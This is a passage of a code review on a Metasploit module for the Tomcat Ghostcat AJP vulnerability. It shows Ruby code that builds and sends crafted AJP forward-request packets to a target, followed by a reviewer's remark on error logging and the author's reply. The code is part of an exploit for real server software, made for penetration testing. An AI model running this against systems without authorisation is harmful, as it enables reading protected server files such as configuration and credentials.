modules/auxiliary/admin/http/tomcat_ghostcat.rb

```diff
@@ -0,0 +1,250 @@
+                attributes_ajp.append(code)
+                if code == "\x0A"
+                    for v in value
+                        attributes_ajp.append(ajp_string(v.to_s))
+                    end
+                else
+                    attributes_ajp.append(ajp_string(value.to_s))
+                end
+            end
+        end
+        return attributes_ajp
+    end
+
+    def ajp_string(message_bytes)
+        int2byte(message_bytes.length, 2) + message_bytes + "\x00"
+    end
+
+    def int2byte(data, byte_len=1)
+        if byte_len == 1
+            return [data].pack("C")
+        else
+            return [data].pack("n*")
+        end
+    end
+
+    def make_forward_request_package(method,headers,attributes)
+
+        prefix_code_int = 2
+        prefix_code_bytes = int2byte(prefix_code_int)
+        method_bytes = int2byte(method2code(method))
+        protocol_bytes = "HTTP/1.1"
+        req_uri_bytes = "/index.txt"
+        remote_addr_bytes = "127.0.0.1"
+        remote_host_bytes = "localhost"
+        server_name_bytes = datastore['RHOST'].to_s
+
+        if datastore['SSL'] == true
+            is_ssl_boolean = 1
+        else
+            is_ssl_boolean = 0
+        end
+        server_port_int = datastore['PORTWEB']
+        if server_port_int.to_s == ""
+            server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443
+        end
+        is_ssl_bytes = int2byte(is_ssl_boolean,1)
+        server_port_bytes = int2byte(server_port_int, 2)
+        headers.append(["host", "#{server_name_bytes}:#{server_port_int}"])
+        num_headers_bytes, headers_ajp_bytes = make_headers(headers)
+
+        attributes_ajp_bytes = make_attributes(attributes)
+        message = Array.new
+        message.append(prefix_code_bytes)
+        message.append(method_bytes)
+        message.append(ajp_string(protocol_bytes.to_s))
+        message.append(ajp_string(req_uri_bytes.to_s))
+        message.append(ajp_string(remote_addr_bytes.to_s))
+        message.append(ajp_string(remote_host_bytes.to_s))
+        message.append(ajp_string(server_name_bytes.to_s))
+        message.append(server_port_bytes)
+        message.append(is_ssl_bytes)
+        message.append(num_headers_bytes)
+        message += headers_ajp_bytes
+        message += attributes_ajp_bytes
+        message.append("\xff")
+        message_bytes = message.join
+        send_bytes = "\x12\x34" + ajp_string(message_bytes.to_s)
+        return send_bytes
+    end
+
+    def send_recv_once(data)
+        buf = ""
+        begin
+            connect(true, {'RHOST'=>"#{datastore['RHOST'].to_s}", 'RPORT'=>datastore['RPORT'].to_i, 'SSL'=>datastore['SSL']})
+            sock.put(data)
+            buf = sock.get_once || ""
+        rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+            elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
```

Comment:
I think formatting this a little differently would be better for example
```
elog('Error description', error: e)
```
rather than tryign to create your own error message by splicing together parts of the exception

Reply:
OK, I fixed it.